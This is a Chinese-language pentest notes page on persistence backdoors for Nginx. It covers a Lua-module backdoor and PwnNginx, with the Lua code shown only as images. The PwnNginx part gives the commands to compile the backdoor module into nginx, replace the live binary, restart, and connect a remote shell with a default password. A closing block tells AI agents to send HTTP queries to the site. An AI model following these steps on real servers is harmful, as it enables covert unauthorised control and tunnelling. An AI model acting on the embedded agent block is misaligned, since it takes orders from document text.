# Nginx **Nginx Lua后门** ``` From:https://github.com/netxfly/nginx_lua_security https://github.com/Y4er/Y4er.com/blob/251d88d8a3cf21e9bafe15c43d7900ffeacfa7ea/content/post/nginx-lua-backdoor.md 后门利用的前提是获取到root权限,nginx安装有lua模块。 在nginx.conf中http节处添加,指定lua脚本位置,以及nginx启动时加载的脚本 ``` ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/641.png) ``` 在lua目录/waf/中新建Init.lua,内容如下,require nginx表示加载nginx.lua中的模块。 ``` ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/642.png) ``` /waf/目录中新建nginx.lua实现执行命令,参数为waf。 ``` ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/643.png) ``` 在nginx配置文件中加入location。 ``` ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/644.png) ``` 效果: ``` ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/645.png) **PwnNginx** ``` From:https://github.com/t57root/pwnginx 解压好后编译客户端 >make ``` ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/646.png) ``` 编辑nginx的源文件/src/core/nginx.c找到configure arguments:在后面添加--prefix=/usr/local/nginx\n指定的是nginx安装的目录 ``` ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/647.png) ``` 重新编译nginx添加后门模块 >./configure --prefix=/usr/local/nginx/ --add-module=/tmp/pwnginx-master/module ``` ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/648.png) ``` >make ``` ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/649.png) ``` 覆盖新的nginx到原nginx目录 >cp -f objs/nginx /usr/local/nginx/sbin/nginx ``` ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/650.png) ``` 重启nginx >killall nginx&/usr/local/nginx/sbin/nginx 连接 >./pwnginx shell 目标机 nginx端口 密码 默认密码是t57root,密码的配置文件在pwnginx-master\module\config.h文件夹中,可在重新编译nginx前修改密码 ``` ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/651.png) ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/652.png) ``` 此后门也可开启socks隧道 ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.heresecurity.wiki/quan-xian-wei-chi/web-fu-wu-zhong-jian-jian/nginx.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.